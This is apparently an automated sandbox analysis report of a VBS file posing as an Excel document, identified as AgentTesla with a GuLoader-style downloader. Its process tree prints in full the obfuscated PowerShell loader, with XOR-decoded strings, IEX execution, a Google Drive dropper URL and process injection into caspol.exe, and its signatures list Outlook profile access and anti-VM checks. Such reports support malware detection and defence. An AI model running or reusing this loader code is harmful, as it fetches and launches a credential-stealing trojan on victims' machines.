Analysis

  • max time kernel
    101s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    08-02-2023 18:41

General

  • Target

    Excel_7712202816310TD01_20230228_17366 XLS.vbs

  • Size

    125KB

  • MD5

    7a8b9600aa46176d0986787d1b1f3e1f

  • SHA1

    4db3fab3f61941a751c3e0a68937ed2a6fb51ddc

  • SHA256

    0ca5f0541030610716ffd5f2c2f0d7372dca5d71e9cf0fd482a84db53fd34a94

  • SHA512

    89025b4ce330d8a7e02aee298cf3ac0caf7c9216939f34b31d5762e4f8dd0c9d8d37745d054eba34b12e990b534f90ffe1b38210774a5632ffadd5e78b1b13a2

  • SSDEEP

    3072:Ftnq3Cj8Lqa7vk7F9ky7jP2WCuH+q0qHgFa6H:Dnw/ma7vk7F9kyXjH90qH+aO

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=1UnU9ydYXvBsgDAS_xzEWlzcaiV6O_QdT

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 4 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Excel_7712202816310TD01_20230228_17366 XLS.vbs"
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\System32\cmd.exe
      cmd /c echo off
      2⤵
        PID:1340
      • C:\Windows\System32\cmd.exe
        cmd /c echo rshell
        2⤵
          PID:1616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nane = """Function Familiefon11 { param([String]`$Uploading); `$Semi = ''; Write-Host `$Semi; Write-Host `$Semi; Write-Host `$Semi; `$Actual = New-Object byte[] (`$Uploading.Length / 2); For(`$Undil=0; `$Undil -lt `$Uploading.Length; `$Undil+=2){ `$Actual[`$Undil/2] = [convert]::ToByte(`$Uploading.Substring(`$Undil, 2), 16); `$Psychoidgu = (`$Actual[`$Undil/2] -bxor 198); `$Actual[`$Undil/2] = `$Psychoidgu; } [String][System.Text.Encoding]::ASCII.GetString(`$Actual);}`$Putnemlama0=Familiefon11 '95BFB5B2A3ABE8A2AAAA';`$Putnemlama1=Familiefon11 '8BAFA5B4A9B5A9A0B2E891AFA8F5F4E893A8B5A7A0A388A7B2AFB0A38BA3B2AEA9A2B5';`$Putnemlama2=Familiefon11 '81A3B296B4A9A587A2A2B4A3B5B5';`$Putnemlama3=Familiefon11 '95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88EA7A8A2AAA394A3A0';`$Putnemlama4=Familiefon11 'B5B2B4AFA8A1';`$Putnemlama5=Familiefon11 '81A3B28BA9A2B3AAA38EA7A8A2AAA3';`$Putnemlama6=Familiefon11 '949295B6A3A5AFA7AA88A7ABA3EAE68EAFA2A384BF95AFA1EAE696B3A4AAAFA5';`$Putnemlama7=Familiefon11 '94B3A8B2AFABA3EAE68BA7A8A7A1A3A2';`$Putnemlama8=Familiefon11 '94A3A0AAA3A5B2A3A282A3AAA3A1A7B2A3';`$Putnemlama9=Familiefon11 '8FA88BA3ABA9B4BF8BA9A2B3AAA3';`$Overtrukk0=Familiefon11 '8BBF82A3AAA3A1A7B2A392BFB6A3';`$Overtrukk1=Familiefon11 '85AAA7B5B5EAE696B3A4AAAFA5EAE695A3A7AAA3A2EAE687A8B5AF85AAA7B5B5EAE687B3B2A985AAA7B5B5';`$Overtrukk2=Familiefon11 '8FA8B0A9ADA3';`$Overtrukk3=Familiefon11 '96B3A4AAAFA5EAE68EAFA2A384BF95AFA1EAE688A3B195AAA9B2EAE690AFB4B2B3A7AA';`$Overtrukk4=Familiefon11 '90AFB4B2B3A7AA87AAAAA9A5';`$Overtrukk5=Familiefon11 'A8B2A2AAAA';`$Overtrukk6=Familiefon11 '88B296B4A9B2A3A5B290AFB4B2B3A7AA8BA3ABA9B4BF';`$Overtrukk7=Familiefon11 '8F839E';`$Overtrukk8=Familiefon11 '9A';`$skamflels=Familiefon11 '93958394F5F4';`$Utricular=Familiefon11 '85A7AAAA91AFA8A2A9B196B4A9A587';function fkp {Param (`$Orthot, `$Miljgarant) ;`$Brakio0 =Familiefon11 'E287AFA8A9B5A4A7B4A2A3E6FBE6EE9D87B6B682A9ABA7AFA89BFCFC85B3B4B4A3A8B282A9ABA7AFA8E881A3B287B5B5A3ABA4AAAFA3B5EEEFE6BAE691AEA3B4A3EB89A4ACA3A5B2E6BDE6E299E881AAA9A4A7AA87B5B5A3ABA4AABF85A7A5AEA3E6EB87A8A2E6E299E88AA9A5A7B2AFA9A8E895B6AAAFB2EEE289B0A3B4B2B4B3ADADFEEF9DEBF79BE883B7B3A7AAB5EEE296B3B2A8A3ABAAA7ABA7F6EFE6BBEFE881A3B292BFB6A3EEE296B3B2A8A3ABAAA7ABA7F7EF';.(`$Overtrukk7) `$Brakio0;`$Brakio5 = Familiefon11 'E287B0A3B4B2AFE6FBE6E287AFA8A9B5A4A7B4A2A3E881A3B28BA3B2AEA9A2EEE296B3B2A8A3ABAAA7ABA7F4EAE69D92BFB6A39D9B9BE686EEE296B3B2A8A3ABAAA7ABA7F5EAE6E296B3B2A8A3ABAAA7ABA7F2EFEF';.(`$Overtrukk7) `$Brakio5;`$Brakio1 = Familiefon11 'B4A3B2B3B4A8E6E287B0A3B4B2AFE88FA8B0A9ADA3EEE2A8B3AAAAEAE686EE9D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88EA7A8A2AAA394A3A09BEE88A3B1EB89A4ACA3A5B2E695BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88EA7A8A2AAA394A3A0EEEE88A3B1EB89A4ACA3A5B2E68FA8B296B2B4EFEAE6EEE287AFA8A9B5A4A7B4A2A3E881A3B28BA3B2AEA9A2EEE296B3B2A8A3ABAAA7ABA7F3EFEFE88FA8B0A9ADA3EEE2A8B3AAAAEAE686EEE289B4B2AEA9B2EFEFEFEFEAE6E28BAFAAACA1A7B4A7A8B2EFEF';.(`$Overtrukk7) `$Brakio1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Plic,[Parameter(Position = 1)] [Type] `$Lavlande31 = [Void]);`$Brakio2 = Familiefon11 'E28DB3B4B0A3AAA7E6FBE69D87B6B682A9ABA7AFA89BFCFC85B3B4B4A3A8B282A9ABA7AFA8E882A3A0AFA8A382BFA8A7ABAFA587B5B5A3ABA4AABFEEEE88A3B1EB89A4ACA3A5B2E695BFB5B2A3ABE894A3A0AAA3A5B2AFA9A8E887B5B5A3ABA4AABF88A7ABA3EEE296B3B2A8A3ABAAA7ABA7FEEFEFEAE69D95BFB5B2A3ABE894A3A0AAA3A5B2AFA9A8E883ABAFB2E887B5B5A3ABA4AABF84B3AFAAA2A3B487A5A5A3B5B59BFCFC94B3A8EFE882A3A0AFA8A382BFA8A7ABAFA58BA9A2B3AAA3EEE296B3B2A8A3ABAAA7ABA7FFEAE6E2A0A7AAB5A3EFE882A3A0AFA8A392BFB6A3EEE289B0A3B4B2B4B3ADADF6EAE6E289B0A3B4B2B4B3ADADF7EAE69D95BFB5B2A3ABE88BB3AAB2AFA5A7B5B282A3AAA3A1A7B2A39BEF';.(`$Overtrukk7) `$Brakio2;`$Brakio3 = Familiefon11 'E28DB3B4B0A3AAA7E882A3A0AFA8A385A9A8B5B2B4B3A5B2A9B4EEE296B3B2A8A3ABAAA7ABA7F0EAE69D95BFB5B2A3ABE894A3A0AAA3A5B2AFA9A8E885A7AAAAAFA8A185A9A8B0A3A8B2AFA9A8B59BFCFC95B2A7A8A2A7B4A2EAE6E296AAAFA5EFE895A3B28FABB6AAA3ABA3A8B2A7B2AFA9A880AAA7A1B5EEE296B3B2A8A3ABAAA7ABA7F1EF';.(`$Overtrukk7) `$Brakio3;`$Brakio4 = Familiefon11 'E28DB3B4B0A3AAA7E882A3A0AFA8A38BA3B2AEA9A2EEE289B0A3B4B2B4B3ADADF4EAE6E289B0A3B4B2B4B3ADADF5EAE6E28AA7B0AAA7A8A2A3F5F7EAE6E296AAAFA5EFE895A3B28FABB6AAA3ABA3A8B2A7B2AFA9A880AAA7A1B5EEE296B3B2A8A3ABAAA7ABA7F1EF';.(`$Overtrukk7) `$Brakio4;`$Brakio5 = Familiefon11 'B4A3B2B3B4A8E6E28DB3B4B0A3AAA7E885B4A3A7B2A392BFB6A3EEEF';.(`$Overtrukk7) `$Brakio5 ;}`$Lophiolamy = Familiefon11 'ADA3B4A8A3AAF5F4';`$Familiefon03 = Familiefon11 '81A3B285A9A8B5A9AAA391AFA8A2A9B1';`$Familiefon00=Familiefon11 '95AEA9B191AFA8A2A9B1';`$Familiefon01 = Familiefon11 'E2AFA8B2B4AAAFA5ADE6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E2B5ADA7ABA0AAA3AAB5E6E280A7ABAFAAAFA3A0A9A8F6F6EFEAE6EE818292E686EE9D8FA8B296B2B49BEAE69D938FA8B2F5F49BEFE6EE9D8FA8B296B2B49BEFEFEF';.(`$Overtrukk7) `$Familiefon01;`$Familiefon02 = Familiefon11 'E284A3B4A9E6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E28AA9B6AEAFA9AAA7ABBFE6E280A7ABAFAAAFA3A0A9A8F6F5EFEAE6EE818292E686EE9D8FA8B296B2B49BEFE6EE9D8FA8B296B2B49BEFEFEF';.(`$Overtrukk7) `$Familiefon02;`$Brakio7 = Familiefon11 'E291A7AFB0A3B4E6FBE6E284A3B4A9E88FA8B0A9ADA3EEF6EF';.(`$Overtrukk7) `$Brakio7;`$Brakio7 = Familiefon11 'E2AFA8B2B4AAAFA5ADE88FA8B0A9ADA3EEE291A7AFB0A3B4EAE6F6EF';.(`$Overtrukk7) `$Brakio7;`$Brakio6 = Familiefon11 'E2A2AFB5A5A9A8A2B3E6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E28AA9B6AEAFA9AAA7ABBFE6E289B0A3B4B2B4B3ADADF2EFEAE6EE818292E686EE9D8FA8B296B2B49BEAE69D938FA8B2F5F49BEAE69D938FA8B2F5F49BEAE69D938FA8B2F5F49BEFE6EE9D8FA8B296B2B49BEFEFEF';.(`$Overtrukk7) `$Brakio6;`$Geira = fkp `$Overtrukk5 `$Overtrukk6;`$Brakio7 = Familiefon11 'E2A4B4A8A3F5E6FBE6E2A2AFB5A5A9A8A2B3E88FA8B0A9ADA3EE9D8FA8B296B2B49BFCFC9CA3B4A9EAE6F0F3F4EAE6F6BEF5F6F6F6EAE6F6BEF2F6EF';.(`$Overtrukk7) `$Brakio7;`$Brakio8 = Familiefon11 'E296AFAAAAA7B4AFE6FBE6E2A2AFB5A5A9A8A2B3E88FA8B0A9ADA3EE9D8FA8B296B2B49BFCFC9CA3B4A9EAE6F4F6F3F0F7FFF4F6EAE6F6BEF5F6F6F6EAE6F6BEF2EF';.(`$Overtrukk7) `$Brakio8;`$Familiefon01 = 'https://drive.google.com/uc?export=download&id=1UnU9ydYXvBsgDAS_xzEWlzcaiV6O_QdT';`$Familiefon00 = Familiefon11 'E2B5B3B6A3B4E6FBE6EE88A3B1EB89A4ACA3A5B2E688A3B2E891A3A485AAAFA3A8B2EFE882A9B1A8AAA9A7A295B2B4AFA8A1EEE280A7ABAFAAAFA3A0A9A8F6F7EF';`$Brakio8 = Familiefon11 'E2A4B4A8A3F4FBE2A3A8B0FCA7B6B6A2A7B2A7';.(`$Overtrukk7) `$Brakio8;`$brne2=`$brne2+'\Vurdering.dat';`$super='';if (-not(Test-Path `$brne2)) {while (`$super -eq '') {.(`$Overtrukk7) `$Familiefon00;Start-Sleep 5;}Set-Content `$brne2 `$super;}`$super = Get-Content `$brne2;`$Brakio9 = Familiefon11 'E284B4A7ADAFA9E6FBE69D95BFB5B2A3ABE885A9A8B0A3B4B29BFCFC80B4A9AB84A7B5A3F0F295B2B4AFA8A1EEE2B5B3B6A3B4EF';.(`$Overtrukk7) `$Brakio9;`$super0 = Familiefon11 '9D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC85A9B6BFEEE284B4A7ADAFA9EAE6F6EAE6E6E2A4B4A8A3F5EAE6F0F3F4EF';.(`$Overtrukk7) `$super0;`$Pineb=`$Brakio.count-652;`$super1 = Familiefon11 '9D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC85A9B6BFEEE284B4A7ADAFA9EAE6F0F3F4EAE6E296AFAAAAA7B4AFEAE6E296AFA8A3A4EF';.(`$Overtrukk7) `$super1;`$super2 = Familiefon11 'E287A8B5B0A7B4B5A0B4AFE6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E2B5ADA7ABA0AAA3AAB5E6E293B2B4AFA5B3AAA7B4EFEAE6EE818292E686EE9D8FA8B296B2B49BEAE69D8FA8B296B2B49BEAE69D8FA8B296B2B49BEAE69D8FA8B296B2B49BEAE69D8FA8B296B2B49BEFE6EE9D8FA8B296B2B49BEFEFEF';.(`$Overtrukk7) `$super2;`$super3 = Familiefon11 'E287A8B5B0A7B4B5A0B4AFE88FA8B0A9ADA3EEE2A4B4A8A3F5EAE296AFAAAAA7B4AFEAE281A3AFB4A7EAF6EAF6EF';.(`$Overtrukk7) `$super3#;""";Function super9 { param([String]$Uploading); For($Undil=0; $Undil -lt $Uploading.Length-1; $Undil+=(0+1)){$Familiefon = $Familiefon + $Uploading.Substring($Undil, 1)}; $Familiefon;}$Sildefang0 = super9 'IEX ';$Sildefang1= super9 $nane;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Sildefang1 ;}else{.$Sildefang0 $Sildefang1;}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1092
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Familiefon11 { param([String]$Uploading); $Semi = ''; Write-Host $Semi; Write-Host $Semi; Write-Host $Semi; $Actual = New-Object byte[] ($Uploading.Length / 2); For($Undil=0; $Undil -lt $Uploading.Length; $Undil+=2){ $Actual[$Undil/2] = [convert]::ToByte($Uploading.Substring($Undil, 2), 16); $Psychoidgu = ($Actual[$Undil/2] -bxor 198); $Actual[$Undil/2] = $Psychoidgu; } [String][System.Text.Encoding]::ASCII.GetString($Actual);}$Putnemlama0=Familiefon11 '95BFB5B2A3ABE8A2AAAA';$Putnemlama1=Familiefon11 '8BAFA5B4A9B5A9A0B2E891AFA8F5F4E893A8B5A7A0A388A7B2AFB0A38BA3B2AEA9A2B5';$Putnemlama2=Familiefon11 '81A3B296B4A9A587A2A2B4A3B5B5';$Putnemlama3=Familiefon11 '95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88EA7A8A2AAA394A3A0';$Putnemlama4=Familiefon11 'B5B2B4AFA8A1';$Putnemlama5=Familiefon11 '81A3B28BA9A2B3AAA38EA7A8A2AAA3';$Putnemlama6=Familiefon11 '949295B6A3A5AFA7AA88A7ABA3EAE68EAFA2A384BF95AFA1EAE696B3A4AAAFA5';$Putnemlama7=Familiefon11 '94B3A8B2AFABA3EAE68BA7A8A7A1A3A2';$Putnemlama8=Familiefon11 '94A3A0AAA3A5B2A3A282A3AAA3A1A7B2A3';$Putnemlama9=Familiefon11 '8FA88BA3ABA9B4BF8BA9A2B3AAA3';$Overtrukk0=Familiefon11 '8BBF82A3AAA3A1A7B2A392BFB6A3';$Overtrukk1=Familiefon11 '85AAA7B5B5EAE696B3A4AAAFA5EAE695A3A7AAA3A2EAE687A8B5AF85AAA7B5B5EAE687B3B2A985AAA7B5B5';$Overtrukk2=Familiefon11 '8FA8B0A9ADA3';$Overtrukk3=Familiefon11 '96B3A4AAAFA5EAE68EAFA2A384BF95AFA1EAE688A3B195AAA9B2EAE690AFB4B2B3A7AA';$Overtrukk4=Familiefon11 '90AFB4B2B3A7AA87AAAAA9A5';$Overtrukk5=Familiefon11 'A8B2A2AAAA';$Overtrukk6=Familiefon11 '88B296B4A9B2A3A5B290AFB4B2B3A7AA8BA3ABA9B4BF';$Overtrukk7=Familiefon11 '8F839E';$Overtrukk8=Familiefon11 '9A';$skamflels=Familiefon11 '93958394F5F4';$Utricular=Familiefon11 '85A7AAAA91AFA8A2A9B196B4A9A587';function fkp {Param ($Orthot, $Miljgarant) ;$Brakio0 =Familiefon11 'E287AFA8A9B5A4A7B4A2A3E6FBE6EE9D87B6B682A9ABA7AFA89BFCFC85B3B4B4A3A8B282A9ABA7AFA8E881A3B287B5B5A3ABA4AAAFA3B5EEEFE6BAE691AEA3B4A3EB89A4ACA3A5B2E6BDE6E299E881AAA9A4A7AA87B5B5A3ABA4AABF85A7A5AEA3E6EB87A8A2E6E299E88AA9A5A7B2AFA9A8E895B6AAAFB2EEE289B0A3B4B2B4B3ADADFEEF9DEBF79BE883B7B3A7AAB5EEE296B3B2A8A3ABAAA7ABA7F6EFE6BBEFE881A3B292BFB6A3EEE296B3B2A8A3ABAAA7ABA7F7EF';.($Overtrukk7) $Brakio0;$Brakio5 = Familiefon11 'E287B0A3B4B2AFE6FBE6E287AFA8A9B5A4A7B4A2A3E881A3B28BA3B2AEA9A2EEE296B3B2A8A3ABAAA7ABA7F4EAE69D92BFB6A39D9B9BE686EEE296B3B2A8A3ABAAA7ABA7F5EAE6E296B3B2A8A3ABAAA7ABA7F2EFEF';.($Overtrukk7) $Brakio5;$Brakio1 = Familiefon11 'B4A3B2B3B4A8E6E287B0A3B4B2AFE88FA8B0A9ADA3EEE2A8B3AAAAEAE686EE9D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88EA7A8A2AAA394A3A09BEE88A3B1EB89A4ACA3A5B2E695BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88EA7A8A2AAA394A3A0EEEE88A3B1EB89A4ACA3A5B2E68FA8B296B2B4EFEAE6EEE287AFA8A9B5A4A7B4A2A3E881A3B28BA3B2AEA9A2EEE296B3B2A8A3ABAAA7ABA7F3EFEFE88FA8B0A9ADA3EEE2A8B3AAAAEAE686EEE289B4B2AEA9B2EFEFEFEFEAE6E28BAFAAACA1A7B4A7A8B2EFEF';.($Overtrukk7) $Brakio1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Plic,[Parameter(Position = 1)] [Type] $Lavlande31 = [Void]);$Brakio2 = Familiefon11 'E28DB3B4B0A3AAA7E6FBE69D87B6B682A9ABA7AFA89BFCFC85B3B4B4A3A8B282A9ABA7AFA8E882A3A0AFA8A382BFA8A7ABAFA587B5B5A3ABA4AABFEEEE88A3B1EB89A4ACA3A5B2E695BFB5B2A3ABE894A3A0AAA3A5B2AFA9A8E887B5B5A3ABA4AABF88A7ABA3EEE296B3B2A8A3ABAAA7ABA7FEEFEFEAE69D95BFB5B2A3ABE894A3A0AAA3A5B2AFA9A8E883ABAFB2E887B5B5A3ABA4AABF84B3AFAAA2A3B487A5A5A3B5B59BFCFC94B3A8EFE882A3A0AFA8A382BFA8A7ABAFA58BA9A2B3AAA3EEE296B3B2A8A3ABAAA7ABA7FFEAE6E2A0A7AAB5A3EFE882A3A0AFA8A392BFB6A3EEE289B0A3B4B2B4B3ADADF6EAE6E289B0A3B4B2B4B3ADADF7EAE69D95BFB5B2A3ABE88BB3AAB2AFA5A7B5B282A3AAA3A1A7B2A39BEF';.($Overtrukk7) $Brakio2;$Brakio3 = Familiefon11 'E28DB3B4B0A3AAA7E882A3A0AFA8A385A9A8B5B2B4B3A5B2A9B4EEE296B3B2A8A3ABAAA7ABA7F0EAE69D95BFB5B2A3ABE894A3A0AAA3A5B2AFA9A8E885A7AAAAAFA8A185A9A8B0A3A8B2AFA9A8B59BFCFC95B2A7A8A2A7B4A2EAE6E296AAAFA5EFE895A3B28FABB6AAA3ABA3A8B2A7B2AFA9A880AAA7A1B5EEE296B3B2A8A3ABAAA7ABA7F1EF';.($Overtrukk7) $Brakio3;$Brakio4 = Familiefon11 'E28DB3B4B0A3AAA7E882A3A0AFA8A38BA3B2AEA9A2EEE289B0A3B4B2B4B3ADADF4EAE6E289B0A3B4B2B4B3ADADF5EAE6E28AA7B0AAA7A8A2A3F5F7EAE6E296AAAFA5EFE895A3B28FABB6AAA3ABA3A8B2A7B2AFA9A880AAA7A1B5EEE296B3B2A8A3ABAAA7ABA7F1EF';.($Overtrukk7) $Brakio4;$Brakio5 = Familiefon11 'B4A3B2B3B4A8E6E28DB3B4B0A3AAA7E885B4A3A7B2A392BFB6A3EEEF';.($Overtrukk7) $Brakio5 ;}$Lophiolamy = Familiefon11 'ADA3B4A8A3AAF5F4';$Familiefon03 = Familiefon11 '81A3B285A9A8B5A9AAA391AFA8A2A9B1';$Familiefon00=Familiefon11 '95AEA9B191AFA8A2A9B1';$Familiefon01 = Familiefon11 'E2AFA8B2B4AAAFA5ADE6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E2B5ADA7ABA0AAA3AAB5E6E280A7ABAFAAAFA3A0A9A8F6F6EFEAE6EE818292E686EE9D8FA8B296B2B49BEAE69D938FA8B2F5F49BEFE6EE9D8FA8B296B2B49BEFEFEF';.($Overtrukk7) $Familiefon01;$Familiefon02 = Familiefon11 'E284A3B4A9E6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E28AA9B6AEAFA9AAA7ABBFE6E280A7ABAFAAAFA3A0A9A8F6F5EFEAE6EE818292E686EE9D8FA8B296B2B49BEFE6EE9D8FA8B296B2B49BEFEFEF';.($Overtrukk7) $Familiefon02;$Brakio7 = Familiefon11 'E291A7AFB0A3B4E6FBE6E284A3B4A9E88FA8B0A9ADA3EEF6EF';.($Overtrukk7) $Brakio7;$Brakio7 = Familiefon11 'E2AFA8B2B4AAAFA5ADE88FA8B0A9ADA3EEE291A7AFB0A3B4EAE6F6EF';.($Overtrukk7) $Brakio7;$Brakio6 = Familiefon11 'E2A2AFB5A5A9A8A2B3E6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E28AA9B6AEAFA9AAA7ABBFE6E289B0A3B4B2B4B3ADADF2EFEAE6EE818292E686EE9D8FA8B296B2B49BEAE69D938FA8B2F5F49BEAE69D938FA8B2F5F49BEAE69D938FA8B2F5F49BEFE6EE9D8FA8B296B2B49BEFEFEF';.($Overtrukk7) $Brakio6;$Geira = fkp $Overtrukk5 $Overtrukk6;$Brakio7 = Familiefon11 'E2A4B4A8A3F5E6FBE6E2A2AFB5A5A9A8A2B3E88FA8B0A9ADA3EE9D8FA8B296B2B49BFCFC9CA3B4A9EAE6F0F3F4EAE6F6BEF5F6F6F6EAE6F6BEF2F6EF';.($Overtrukk7) $Brakio7;$Brakio8 = Familiefon11 'E296AFAAAAA7B4AFE6FBE6E2A2AFB5A5A9A8A2B3E88FA8B0A9ADA3EE9D8FA8B296B2B49BFCFC9CA3B4A9EAE6F4F6F3F0F7FFF4F6EAE6F6BEF5F6F6F6EAE6F6BEF2EF';.($Overtrukk7) $Brakio8;$Familiefon01 = 'https://drive.google.com/uc?export=download&id=1UnU9ydYXvBsgDAS_xzEWlzcaiV6O_QdT';$Familiefon00 = Familiefon11 'E2B5B3B6A3B4E6FBE6EE88A3B1EB89A4ACA3A5B2E688A3B2E891A3A485AAAFA3A8B2EFE882A9B1A8AAA9A7A295B2B4AFA8A1EEE280A7ABAFAAAFA3A0A9A8F6F7EF';$Brakio8 = Familiefon11 'E2A4B4A8A3F4FBE2A3A8B0FCA7B6B6A2A7B2A7';.($Overtrukk7) $Brakio8;$brne2=$brne2+'\Vurdering.dat';$super='';if (-not(Test-Path $brne2)) {while ($super -eq '') {.($Overtrukk7) $Familiefon00;Start-Sleep 5;}Set-Content $brne2 $super;}$super = Get-Content $brne2;$Brakio9 = Familiefon11 'E284B4A7ADAFA9E6FBE69D95BFB5B2A3ABE885A9A8B0A3B4B29BFCFC80B4A9AB84A7B5A3F0F295B2B4AFA8A1EEE2B5B3B6A3B4EF';.($Overtrukk7) $Brakio9;$super0 = Familiefon11 '9D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC85A9B6BFEEE284B4A7ADAFA9EAE6F6EAE6E6E2A4B4A8A3F5EAE6F0F3F4EF';.($Overtrukk7) $super0;$Pineb=$Brakio.count-652;$super1 = Familiefon11 '9D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC85A9B6BFEEE284B4A7ADAFA9EAE6F0F3F4EAE6E296AFAAAAA7B4AFEAE6E296AFA8A3A4EF';.($Overtrukk7) $super1;$super2 = Familiefon11 'E287A8B5B0A7B4B5A0B4AFE6FBE69D95BFB5B2A3ABE894B3A8B2AFABA3E88FA8B2A3B4A9B695A3B4B0AFA5A3B5E88BA7B4B5AEA7AA9BFCFC81A3B282A3AAA3A1A7B2A380A9B480B3A8A5B2AFA9A896A9AFA8B2A3B4EEEEA0ADB6E6E2B5ADA7ABA0AAA3AAB5E6E293B2B4AFA5B3AAA7B4EFEAE6EE818292E686EE9D8FA8B296B2B49BEAE69D8FA8B296B2B49BEAE69D8FA8B296B2B49BEAE69D8FA8B296B2B49BEAE69D8FA8B296B2B49BEFE6EE9D8FA8B296B2B49BEFEFEF';.($Overtrukk7) $super2;$super3 = Familiefon11 'E287A8B5B0A7B4B5A0B4AFE88FA8B0A9ADA3EEE2A4B4A8A3F5EAE296AFAAAAA7B4AFEAE281A3AFB4A7EAF6EAF6EF';.($Overtrukk7) $super3#"
            3⤵
            • Blocklisted process makes network request
            • Checks QEMU agent file
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
              4⤵
              • Checks QEMU agent file
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1792

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
